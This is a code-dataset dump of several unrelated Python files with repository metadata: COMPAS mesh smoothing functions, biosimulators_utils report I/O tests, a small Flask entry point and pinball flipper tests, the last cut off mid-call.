55f259607deea501f862cbaea79bd97d7e56ead6
|
[
"MIT"
] | 9
|
2019-09-11T08:53:19.000Z
|
2019-09-16T08:35:39.000Z
|
src/compas/datastructures/mesh/smoothing.py
|
Licini/compas
|
34f65adb3d0abc3f403312ffba62aa76f3376292
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from compas.geometry import centroid_points
from compas.geometry import centroid_polygon
__all__ = [
'mesh_smooth_centroid',
'mesh_smooth_centerofmass',
'mesh_smooth_area',
]
def mesh_smooth_centroid(mesh, fixed=None, kmax=100, damping=0.5, callback=None, callback_args=None):
"""Smooth a mesh by moving every free vertex to the centroid of its neighbors.
Parameters
----------
mesh : Mesh
A mesh object.
fixed : list, optional
The fixed vertices of the mesh.
kmax : int, optional
The maximum number of iterations.
damping : float, optional
The damping factor.
callback : callable, optional
A user-defined callback function to be executed after every iteration.
callback_args : list, optional
A list of arguments to be passed to the callback.
Raises
------
Exception
If a callback is provided, but it is not callable.
Examples
--------
.. plot::
:include-source:
import compas
from compas.datastructures import Mesh
from compas.datastructures import mesh_smooth_centroid
from compas_plotters import MeshPlotter
mesh = Mesh.from_obj(compas.get('faces.obj'))
fixed = list(mesh.vertices_where({'vertex_degree': 2}))
mesh_smooth_centroid(mesh, fixed=fixed)
plotter = MeshPlotter(mesh)
plotter.draw_vertices(facecolor={key: '#ff0000' for key in fixed})
plotter.draw_faces()
plotter.draw_edges()
plotter.show()
"""
if callback:
if not callable(callback):
raise Exception('Callback is not callable.')
fixed = fixed or []
fixed = set(fixed)
for k in range(kmax):
key_xyz = {key: mesh.vertex_coordinates(key) for key in mesh.vertices()}
for key, attr in mesh.vertices(True):
if key in fixed:
continue
x, y, z = key_xyz[key]
cx, cy, cz = centroid_points([key_xyz[nbr] for nbr in mesh.vertex_neighbors(key)])
attr['x'] += damping * (cx - x)
attr['y'] += damping * (cy - y)
attr['z'] += damping * (cz - z)
if callback:
callback(k, callback_args)
def mesh_smooth_centerofmass(mesh, fixed=None, kmax=100, damping=0.5, callback=None, callback_args=None):
"""Smooth a mesh by moving every free vertex to the center of mass of the polygon formed by the neighboring vertices.
Parameters
----------
mesh : Mesh
A mesh object.
fixed : list, optional
The fixed vertices of the mesh.
kmax : int, optional
The maximum number of iterations.
damping : float, optional
The damping factor.
callback : callable, optional
A user-defined callback function to be executed after every iteration.
callback_args : list, optional
A list of arguments to be passed to the callback.
Raises
------
Exception
If a callback is provided, but it is not callable.
Examples
--------
.. plot::
:include-source:
import compas
from compas.datastructures import Mesh
from compas.datastructures import mesh_smooth_centerofmass
from compas_plotters import MeshPlotter
mesh = Mesh.from_obj(compas.get('faces.obj'))
fixed = [key for key in mesh.vertices() if mesh.vertex_degree(key) == 2]
mesh_smooth_centerofmass(mesh, fixed=fixed)
plotter = MeshPlotter(mesh)
plotter.draw_vertices(facecolor={key: '#ff0000' for key in fixed})
plotter.draw_faces()
plotter.draw_edges()
plotter.show()
"""
if callback:
if not callable(callback):
raise Exception('Callback is not callable.')
fixed = fixed or []
fixed = set(fixed)
for k in range(kmax):
key_xyz = {key: mesh.vertex_coordinates(key) for key in mesh.vertices()}
for key, attr in mesh.vertices(True):
if key in fixed:
continue
x, y, z = key_xyz[key]
cx, cy, cz = centroid_polygon([key_xyz[nbr] for nbr in mesh.vertex_neighbors(key, ordered=True)])
attr['x'] += damping * (cx - x)
attr['y'] += damping * (cy - y)
attr['z'] += damping * (cz - z)
if callback:
callback(k, callback_args)
def mesh_smooth_area(mesh, fixed=None, kmax=100, damping=0.5, callback=None, callback_args=None):
"""Smooth a mesh by moving each vertex to the barycenter of the centroids of the surrounding faces, weighted by area.
Parameters
----------
mesh : Mesh
A mesh object.
fixed : list, optional
The fixed vertices of the mesh.
kmax : int, optional
The maximum number of iterations.
damping : float, optional
The damping factor.
callback : callable, optional
A user-defined callback function to be executed after every iteration.
callback_args : list, optional
A list of arguments to be passed to the callback.
Raises
------
Exception
If a callback is provided, but it is not callable.
Examples
--------
.. plot::
:include-source:
import compas
from compas.datastructures import Mesh
from compas.datastructures import mesh_smooth_area
from compas_plotters import MeshPlotter
mesh = Mesh.from_obj(compas.get('faces.obj'))
fixed = [key for key in mesh.vertices() if mesh.vertex_degree(key) == 2]
mesh_smooth_area(mesh, fixed=fixed)
plotter = MeshPlotter(mesh)
plotter.draw_vertices(facecolor={key: '#ff0000' for key in fixed})
plotter.draw_faces()
plotter.draw_edges()
plotter.show()
"""
if callback:
if not callable(callback):
raise Exception('Callback is not callable.')
fixed = fixed or []
fixed = set(fixed)
for k in range(kmax):
key_xyz = {key: mesh.vertex_coordinates(key)[:] for key in mesh.vertices()}
fkey_centroid = {fkey: mesh.face_centroid(fkey) for fkey in mesh.faces()}
fkey_area = {fkey: mesh.face_area(fkey) for fkey in mesh.faces()}
for key, attr in mesh.vertices(True):
if key in fixed:
continue
x, y, z = key_xyz[key]
A = 0
ax, ay, az = 0, 0, 0
for fkey in mesh.vertex_faces(key, ordered=True):
if fkey is None:
continue
a = fkey_area[fkey]
c = fkey_centroid[fkey]
ax += a * c[0]
ay += a * c[1]
az += a * c[2]
A += a
if A:
ax = ax / A
ay = ay / A
az = az / A
attr['x'] += damping * (ax - x)
attr['y'] += damping * (ay - y)
attr['z'] += damping * (az - z)
if callback:
callback(k, callback_args)
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
import compas
from compas.datastructures import Mesh
from compas_plotters import MeshPlotter
mesh = Mesh.from_obj(compas.get('faces.obj'))
fixed = list(mesh.vertices_where({'vertex_degree': 2}))
lines = []
for u, v in mesh.edges():
lines.append({
'start': mesh.vertex_coordinates(u, 'xy'),
'end': mesh.vertex_coordinates(v, 'xy'),
'color': '#cccccc',
'width': 1.0,
})
mesh_smooth_area(mesh, fixed=fixed, kmax=100)
plotter = MeshPlotter(mesh, figsize=(10, 7))
plotter.draw_lines(lines)
plotter.draw_vertices(facecolor={key: '#ff0000' for key in fixed})
plotter.draw_edges()
plotter.show()
| 27.803448
| 121
| 0.581049
| 981
| 8,063
| 4.66055
| 0.139653
| 0.018373
| 0.015748
| 0.045932
| 0.832021
| 0.800525
| 0.783902
| 0.776903
| 0.776903
| 0.766842
| 0
| 0.008868
| 0.300757
| 8,063
| 289
| 122
| 27.899654
| 0.802057
| 0.448964
| 0
| 0.45
| 0
| 0
| 0.052513
| 0.006002
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03
| false
| 0
| 0.08
| 0
| 0.11
| 0.01
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b15ac0e21510ba636bab8eb495fd1c8fd5a1408b
| 138
|
py
|
Python
|
dist/Basilisk/simulation/vscmgStateEffector/__init__.py
|
ian-cooke/basilisk_mag
|
a8b1e37c31c1287549d6fd4d71fcaa35b6fc3f14
|
[
"0BSD"
] | null | null | null |
dist/Basilisk/simulation/vscmgStateEffector/__init__.py
|
ian-cooke/basilisk_mag
|
a8b1e37c31c1287549d6fd4d71fcaa35b6fc3f14
|
[
"0BSD"
] | 1
|
2019-03-13T20:52:22.000Z
|
2019-03-13T20:52:22.000Z
|
dist/Basilisk/simulation/vscmgStateEffector/__init__.py
|
ian-cooke/basilisk_mag
|
a8b1e37c31c1287549d6fd4d71fcaa35b6fc3f14
|
[
"0BSD"
] | null | null | null |
# This __init__.py file for the vscmgStateEffector package is automatically generated by the build system
from vscmgStateEffector import *
| 69
| 105
| 0.847826
| 18
| 138
| 6.277778
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130435
| 138
| 2
| 106
| 69
| 0.941667
| 0.746377
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b1686ef2960b20506242b7efb0b494b24a5478d7
| 33
|
py
|
Python
|
singleton_widgets/__init__.py
|
sagemath/sage-combinat-widgets
|
b17c62ed982a7d4ec7a50932765b978069dc25da
|
[
"BSL-1.0"
] | 3
|
2018-09-05T15:04:35.000Z
|
2021-11-09T12:57:54.000Z
|
singleton_widgets/__init__.py
|
sagemath/sage-combinat-widgets
|
b17c62ed982a7d4ec7a50932765b978069dc25da
|
[
"BSL-1.0"
] | 18
|
2018-08-20T13:49:33.000Z
|
2022-01-19T15:24:07.000Z
|
singleton_widgets/__init__.py
|
sagemath/sage-combinat-widgets
|
b17c62ed982a7d4ec7a50932765b978069dc25da
|
[
"BSL-1.0"
] | 5
|
2019-04-13T16:50:04.000Z
|
2021-11-09T12:57:43.000Z
|
from .singleton_widgets import *
| 16.5
| 32
| 0.818182
| 4
| 33
| 6.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b185a3f8f92282de65544603e8fbe8dbe1798429
| 14,979
|
py
|
Python
|
tests/report/test_report_io.py
|
virtualcell/Biosimulators_utils
|
1b34e1e0a9ace706d245e9d515d0fae1e55a248d
|
[
"MIT"
] | null | null | null |
tests/report/test_report_io.py
|
virtualcell/Biosimulators_utils
|
1b34e1e0a9ace706d245e9d515d0fae1e55a248d
|
[
"MIT"
] | null | null | null |
tests/report/test_report_io.py
|
virtualcell/Biosimulators_utils
|
1b34e1e0a9ace706d245e9d515d0fae1e55a248d
|
[
"MIT"
] | null | null | null |
from biosimulators_utils.report import data_model
from biosimulators_utils.report import io
from biosimulators_utils.report.warnings import MissingDataWarning, ExtraDataWarning
from biosimulators_utils.sedml.data_model import Report, DataSet
import numpy
import numpy.testing
import os
import shutil
import tempfile
import unittest
class ReportIoTestCase(unittest.TestCase):
def setUp(self):
self.dirname = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.dirname)
def test_read_write(self):
report_1 = Report(
id='report_1',
data_sets=[
DataSet(id='w', label='W'),
DataSet(id='x', label='X'),
DataSet(id='y', label='Y'),
DataSet(id='z', label='Z'),
],
)
report_2 = Report(
id='report_2',
data_sets=[
DataSet(id='a', label='A'),
DataSet(id='b', label='B'),
DataSet(id='c', label='C'),
DataSet(id='d', label='D'),
],
)
report_3 = Report(
id='report_3',
data_sets=[
DataSet(id='a', label='A'),
DataSet(id='b', label='B'),
DataSet(id='c', label='C'),
DataSet(id='d', label='D'),
],
)
data_set_results_1 = data_model.DataSetResults({
'w': None,
'x': numpy.array([1, 2, 3]),
'y': numpy.array([4., numpy.nan]),
'z': numpy.array(6.),
})
data_set_results_2 = data_model.DataSetResults({
'a': numpy.array([1, 2]),
'b': numpy.array([7., 8., 9.]),
'c': numpy.array(True),
'd': None,
})
data_set_results_3 = data_model.DataSetResults({
'a': numpy.array([[1, 2], [3, 4], [5, 6]]),
'b': numpy.array([7., 8., 9.]),
'c': numpy.array(True),
'd': None,
})
# CSV, TSV
for format in [data_model.ReportFormat.csv, data_model.ReportFormat.tsv, data_model.ReportFormat.xlsx]:
rel_path_1 = os.path.join(format.value, 'a/b/c.sedml', report_1.id)
rel_path_2 = os.path.join(format.value, 'a/d.sedml', report_2.id)
rel_path_3 = os.path.join(format.value, 'e.sedml', report_2.id)
io.ReportWriter().run(report_1, data_set_results_1, self.dirname, rel_path_1, format=format)
io.ReportWriter().run(report_2, data_set_results_2, self.dirname, rel_path_2, format=format)
with self.assertRaisesRegex(ValueError, 'Multidimensional reports cannot be exported'):
io.ReportWriter().run(report_3, data_set_results_3, self.dirname, rel_path_3, format=format)
data_set_results_1_b = io.ReportReader().run(report_1, self.dirname, rel_path_1, format=format)
data_set_results_2_b = io.ReportReader().run(report_2, self.dirname, rel_path_2, format=format)
self.assertEqual(set(io.ReportReader().get_ids(self.dirname, format=format)), set([rel_path_1, rel_path_2]))
numpy.testing.assert_allclose(data_set_results_1_b['w'], numpy.array([numpy.nan, numpy.nan, numpy.nan]))
numpy.testing.assert_allclose(data_set_results_1_b['x'], numpy.array([1., 2., 3.]))
numpy.testing.assert_allclose(data_set_results_1_b['y'], numpy.array([4., numpy.nan, numpy.nan]))
numpy.testing.assert_allclose(data_set_results_1_b['z'], numpy.array([6., numpy.nan, numpy.nan]))
self.assertEqual(data_set_results_1_b['w'].dtype.name, 'float64')
self.assertEqual(data_set_results_1_b['x'].dtype.name, 'float64')
self.assertEqual(data_set_results_1_b['y'].dtype.name, 'float64')
self.assertEqual(data_set_results_1_b['z'].dtype.name, 'float64')
numpy.testing.assert_allclose(data_set_results_2_b['a'], numpy.array([1., 2., numpy.nan]))
numpy.testing.assert_allclose(data_set_results_2_b['b'], numpy.array([7., 8., 9.]))
numpy.testing.assert_allclose(data_set_results_2_b['c'], numpy.array([1., numpy.nan, numpy.nan]))
numpy.testing.assert_allclose(data_set_results_2_b['d'], numpy.array([numpy.nan, numpy.nan, numpy.nan]))
self.assertEqual(data_set_results_2_b['a'].dtype.name, 'float64')
self.assertEqual(data_set_results_2_b['b'].dtype.name, 'float64')
self.assertEqual(data_set_results_2_b['c'].dtype.name, 'float64')
self.assertEqual(data_set_results_2_b['d'].dtype.name, 'float64')
# HDF
for format in [data_model.ReportFormat.h5]:
rel_path_1 = os.path.join(format.value, 'a/b/c.sedml', report_1.id)
rel_path_2 = os.path.join(format.value, 'a/d.sedml', report_2.id)
rel_path_3 = os.path.join(format.value, 'e.sedml', report_2.id)
io.ReportWriter().run(report_1, data_set_results_1, self.dirname, rel_path_1, format=format)
io.ReportWriter().run(report_2, data_set_results_2, self.dirname, rel_path_2, format=format)
io.ReportWriter().run(report_3, data_set_results_3, self.dirname, rel_path_3, format=format)
data_set_results_1_b = io.ReportReader().run(report_1, self.dirname, rel_path_1, format=format)
data_set_results_2_b = io.ReportReader().run(report_2, self.dirname, rel_path_2, format=format)
data_set_results_3_b = io.ReportReader().run(report_3, self.dirname, rel_path_3, format=format)
self.assertEqual(set(io.ReportReader().get_ids(self.dirname, format=format)), set([rel_path_1, rel_path_2, rel_path_3]))
self.assertEqual(data_set_results_1_b['w'], None)
numpy.testing.assert_allclose(data_set_results_1_b['x'], numpy.array([1, 2, 3]))
numpy.testing.assert_allclose(data_set_results_1_b['y'], numpy.array([4., numpy.nan]))
numpy.testing.assert_allclose(data_set_results_1_b['z'], numpy.array(6.))
self.assertEqual(data_set_results_1_b['x'].dtype.name, 'int64')
self.assertEqual(data_set_results_1_b['y'].dtype.name, 'float64')
self.assertEqual(data_set_results_1_b['z'].dtype.name, 'float64')
numpy.testing.assert_allclose(data_set_results_2_b['a'], numpy.array([1, 2]))
numpy.testing.assert_allclose(data_set_results_2_b['b'], numpy.array([7., 8., 9.]))
numpy.testing.assert_allclose(data_set_results_2_b['c'], numpy.array(True))
self.assertEqual(data_set_results_2_b['d'], None)
self.assertEqual(data_set_results_2_b['a'].dtype.name, 'int64')
self.assertEqual(data_set_results_2_b['b'].dtype.name, 'float64')
self.assertEqual(data_set_results_2_b['c'].dtype.name, 'bool')
numpy.testing.assert_allclose(data_set_results_3_b['a'], numpy.array([[1, 2], [3, 4], [5, 6]]))
numpy.testing.assert_allclose(data_set_results_3_b['b'], numpy.array([7., 8., 9.]))
numpy.testing.assert_allclose(data_set_results_3_b['c'], numpy.array(True))
self.assertEqual(data_set_results_3_b['d'], None)
self.assertEqual(data_set_results_3_b['a'].dtype.name, 'int64')
self.assertEqual(data_set_results_3_b['b'].dtype.name, 'float64')
self.assertEqual(data_set_results_3_b['c'].dtype.name, 'bool')
def test_read_write_warnings(self):
report_1 = Report(
id='report_1',
data_sets=[
DataSet(id='x', label='X'),
DataSet(id='y', label='Y'),
DataSet(id='z', label='Z'),
],
)
data_set_results_1 = data_model.DataSetResults({
'x': numpy.array([1., 2.]),
'y': numpy.array([3., 4.]),
'z': numpy.array([5., 6.]),
})
rel_path_1 = os.path.join('a/b/c.sedml', report_1.id)
io.ReportWriter().run(report_1, data_set_results_1, self.dirname, rel_path_1, format=data_model.ReportFormat.h5)
report_1.data_sets.append(DataSet(id='w', label='W'))
with self.assertWarns(MissingDataWarning):
io.ReportReader().run(report_1, self.dirname, rel_path_1, format=data_model.ReportFormat.h5)
report_1.data_sets.pop()
report_1.data_sets.pop()
with self.assertWarns(ExtraDataWarning):
io.ReportReader().run(report_1, self.dirname, rel_path_1, format=data_model.ReportFormat.h5)
def test_read_write_duplicate_labels(self):
# labels in same order
report_1 = Report(
id='report_1',
data_sets=[
DataSet(id='x', label='A'),
DataSet(id='y', label='A'),
DataSet(id='z', label='A'),
],
)
data_set_results_1 = data_model.DataSetResults({
'x': numpy.array([1., 2.]),
'y': numpy.array([3., 4.]),
'z': numpy.array([5., 6.]),
})
rel_path_1 = os.path.join('a/b/c.sedml', report_1.id)
io.ReportWriter().run(report_1, data_set_results_1, self.dirname, rel_path_1, format=data_model.ReportFormat.csv)
data_set_results_2 = io.ReportReader().run(report_1, self.dirname, rel_path_1, format=data_model.ReportFormat.csv)
numpy.testing.assert_allclose(data_set_results_2['x'], numpy.array([1., 2.]))
numpy.testing.assert_allclose(data_set_results_2['y'], numpy.array([3., 4.]))
numpy.testing.assert_allclose(data_set_results_2['z'], numpy.array([5., 6.]))
# labels in different order
report_1 = Report(
id='report_1',
data_sets=[
DataSet(id='x', label='X'),
DataSet(id='y', label='X'),
DataSet(id='z', label='Z'),
],
)
data_set_results_1 = data_model.DataSetResults({
'x': numpy.array([1., 2.]),
'y': numpy.array([3., 4.]),
'z': numpy.array([5., 6.]),
})
rel_path_1 = os.path.join('a/b/c.sedml', report_1.id)
io.ReportWriter().run(report_1, data_set_results_1, self.dirname, rel_path_1, format=data_model.ReportFormat.csv)
report_2 = Report(
id='report_1',
data_sets=[
DataSet(id='x', label='X'),
DataSet(id='z', label='Z'),
DataSet(id='y', label='X'),
],
)
data_set_results_2 = io.ReportReader().run(report_2, self.dirname, rel_path_1, format=data_model.ReportFormat.csv)
self.assertEqual(set(data_set_results_2.keys()), set(['z']))
numpy.testing.assert_allclose(data_set_results_2['z'], numpy.array([5., 6.]))
def test_overwrite_report(self):
report_1 = Report(
id='report_1',
data_sets=[
DataSet(id='x', label='X'),
DataSet(id='y', label='Y'),
DataSet(id='z', label='Z'),
],
)
data_set_results_1 = data_model.DataSetResults({
'x': numpy.array([1., 2.]),
'y': numpy.array([3., 4.]),
'z': numpy.array([5., 6.]),
})
rel_path_1 = os.path.join('a/b/c.sedml', report_1.id)
io.ReportWriter().run(report_1, data_set_results_1, self.dirname, rel_path_1, format=data_model.ReportFormat.h5)
data_set_results_2 = io.ReportReader().run(report_1, self.dirname, rel_path_1, format=data_model.ReportFormat.h5)
numpy.testing.assert_allclose(data_set_results_2['x'], numpy.array([1., 2.]))
numpy.testing.assert_allclose(data_set_results_2['y'], numpy.array([3., 4.]))
numpy.testing.assert_allclose(data_set_results_2['z'], numpy.array([5., 6.]))
data_set_results_1 = data_model.DataSetResults({
'x': numpy.array([1., 2.]) + 1.,
'y': numpy.array([3., 4.]) + 1.,
'z': numpy.array([5., 6.]) + 1.,
})
io.ReportWriter().run(report_1, data_set_results_1, self.dirname, rel_path_1, format=data_model.ReportFormat.h5)
data_set_results_2 = io.ReportReader().run(report_1, self.dirname, rel_path_1, format=data_model.ReportFormat.h5)
numpy.testing.assert_allclose(data_set_results_2['x'], numpy.array([1., 2.]) + 1.)
numpy.testing.assert_allclose(data_set_results_2['y'], numpy.array([3., 4.]) + 1.)
numpy.testing.assert_allclose(data_set_results_2['z'], numpy.array([5., 6.]) + 1.)
def test_write_error_handling(self):
with self.assertRaisesRegex(NotImplementedError, 'is not supported'):
io.ReportWriter().run(Report(), None, None, None, format='TSV')
report = Report(data_sets=[DataSet(id='x', label='x')])
data_set_results = data_model.DataSetResults({'x': numpy.zeros((3, ))})
io.ReportWriter().run(report, data_set_results, self.dirname, '.', format=data_model.ReportFormat.csv)
data_set_results['x'] = data_set_results['x'].reshape((3, 1))
with self.assertRaisesRegex(ValueError, 'Multidimensional reports cannot be exported'):
io.ReportWriter().run(report, data_set_results, self.dirname, '.', format=data_model.ReportFormat.csv)
def test_read_error_handling(self):
with self.assertRaisesRegex(NotImplementedError, 'is not supported'):
io.ReportReader().run(Report(), None, None, format='TSV')
def test_get_ids(self):
report = Report(
data_sets=[
DataSet(id='A', label='A'),
DataSet(id='B', label='A'),
],
)
results = data_model.DataSetResults({
report.data_sets[0].id: numpy.array([1, 2, 3]),
report.data_sets[1].id: numpy.array([4, 5, 6]),
})
for format in [data_model.ReportFormat.h5, data_model.ReportFormat.csv]:
filename = os.path.join(self.dirname, 'test')
io.ReportWriter().run(report, results, filename, 'a/b/c.sedml/report1', format=format)
io.ReportWriter().run(report, results, filename, 'a/b/c.sedml/report2', format=format)
io.ReportWriter().run(report, results, filename, 'a/b/c.sedml/report3', format=format)
io.ReportWriter().run(report, results, filename, 'a/b/d.sedml/report4', format=format)
io.ReportWriter().run(report, results, filename, 'a/b/report5', format=format)
io.ReportWriter().run(report, results, filename, 'a/b/report6', format=format)
self.assertEqual(set(io.ReportReader().get_ids(filename, format=format)), set([
'a/b/c.sedml/report1',
'a/b/c.sedml/report2',
'a/b/c.sedml/report3',
'a/b/d.sedml/report4',
'a/b/report5',
'a/b/report6',
]))
with self.assertRaisesRegex(NotImplementedError, 'is not supported'):
io.ReportReader().get_ids(filename, format=None)
| 47.401899
| 132
| 0.602644
| 2,017
| 14,979
| 4.225087
| 0.059494
| 0.066534
| 0.133067
| 0.061605
| 0.873504
| 0.829735
| 0.811312
| 0.794532
| 0.767895
| 0.723187
| 0
| 0.029076
| 0.240003
| 14,979
| 315
| 133
| 47.552381
| 0.719519
| 0.003939
| 0
| 0.538462
| 0
| 0
| 0.050352
| 0
| 0
| 0
| 0
| 0
| 0.223077
| 1
| 0.034615
| false
| 0
| 0.038462
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4931c15a460bc532b0c2b1145d844c85b96a532a
| 282
|
py
|
Python
|
server.py
|
Thomas-Arndt/recipes
|
a8a683221e1f48faacfdde5cc665e83f19dedccd
|
[
"MIT"
] | null | null | null |
server.py
|
Thomas-Arndt/recipes
|
a8a683221e1f48faacfdde5cc665e83f19dedccd
|
[
"MIT"
] | null | null | null |
server.py
|
Thomas-Arndt/recipes
|
a8a683221e1f48faacfdde5cc665e83f19dedccd
|
[
"MIT"
] | null | null | null |
from flask_app import app
from flask_app.controllers import controller_routes
from flask_app.controllers import controller_user
from flask_app.controllers import controller_recipe
from flask_app.controllers import controller_like
while __name__=="__main__":
app.run(debug=True)
| 35.25
| 51
| 0.858156
| 40
| 282
| 5.625
| 0.4
| 0.2
| 0.266667
| 0.408889
| 0.693333
| 0.693333
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095745
| 282
| 8
| 52
| 35.25
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0.028269
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.714286
| 0
| 0.714286
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
493fd5802e9ca9388e1ad1acc951737563258143
| 8,252
|
py
|
Python
|
mpf/tests/test_Flippers.py
|
cloudjor/mpf
|
1cf6bf18b0d81120383b0b128b0ebbfa1c62717c
|
[
"MIT"
] | null | null | null |
mpf/tests/test_Flippers.py
|
cloudjor/mpf
|
1cf6bf18b0d81120383b0b128b0ebbfa1c62717c
|
[
"MIT"
] | null | null | null |
mpf/tests/test_Flippers.py
|
cloudjor/mpf
|
1cf6bf18b0d81120383b0b128b0ebbfa1c62717c
|
[
"MIT"
] | null | null | null |
from mpf.platforms.interfaces.driver_platform_interface import PulseSettings, HoldSettings
from mpf.core.platform import SwitchSettings, DriverSettings
from mpf.tests.MpfTestCase import MpfTestCase
from unittest.mock import MagicMock, call
class TestFlippers(MpfTestCase):
def getConfigFile(self):
return 'config.yaml'
def getMachinePath(self):
return 'tests/machine_files/flippers/'
def get_platform(self):
return 'virtual'
def test_single(self):
self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule = MagicMock()
self.machine.flippers.f_test_single.enable()
self.assertEqual(1, len(self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule.
_mock_call_args_list))
self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule.assert_called_once_with(
SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
pulse_settings=PulseSettings(power=1.0, duration=10),
hold_settings=HoldSettings(power=0.125), recycle=False)
)
self.machine.default_platform.clear_hw_rule = MagicMock()
self.machine.flippers.f_test_single.disable()
self.assertEqual(1, self.machine.default_platform.clear_hw_rule.called)
self.machine.default_platform.clear_hw_rule.assert_called_once_with(
SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
pulse_settings=PulseSettings(power=1.0, duration=10),
hold_settings=HoldSettings(power=0.125), recycle=False)
)
def test_hold_with_eos(self):
self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_and_disable_rule = MagicMock()
self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule = MagicMock()
self.machine.flippers.f_test_hold_eos.enable()
self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule.assert_called_once_with(
SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
DriverSettings(hw_driver=self.machine.coils.c_flipper_hold.hw_driver,
pulse_settings=PulseSettings(power=1.0, duration=10),
hold_settings=HoldSettings(power=1.0), recycle=False)
)
self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_and_disable_rule.assert_called_with(
SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
SwitchSettings(hw_switch=self.machine.switches.s_flipper_eos.hw_switch, invert=False, debounce=False),
DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
pulse_settings=PulseSettings(power=1.0, duration=10),
hold_settings=HoldSettings(power=0.125), recycle=False)
)
self.machine.default_platform.clear_hw_rule = MagicMock()
self.machine.flippers.f_test_hold_eos.disable()
self.machine.default_platform.clear_hw_rule.assert_has_calls([
call(
SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
pulse_settings=PulseSettings(power=1.0, duration=10),
hold_settings=HoldSettings(power=0.125), recycle=False)
),
call(
SwitchSettings(hw_switch=self.machine.switches.s_flipper_eos.hw_switch, invert=False, debounce=False),
DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
pulse_settings=PulseSettings(power=1.0, duration=10),
hold_settings=HoldSettings(power=0.125), recycle=False)
),
call(
SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
DriverSettings(hw_driver=self.machine.coils.c_flipper_hold.hw_driver,
pulse_settings=PulseSettings(power=1.0, duration=10),
hold_settings=HoldSettings(power=1.0), recycle=False)
),
], any_order = True)
def test_flipper_with_settings(self):
flipper = self.machine.flippers.f_test_flippers_with_settings
self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule = MagicMock()
flipper.enable()
self.assertEqual(1, len(self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule.
_mock_call_args_list))
self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule.assert_called_once_with(
SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
pulse_settings=PulseSettings(power=1.0, duration=10),
hold_settings=HoldSettings(power=0.125), recycle=False)
)
self.machine.default_platform.clear_hw_rule = MagicMock()
flipper.disable()
self.assertEqual(1, self.machine.default_platform.clear_hw_rule.called)
self.machine.default_platform.clear_hw_rule.assert_called_once_with(
SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
pulse_settings=PulseSettings(power=1.0, duration=10),
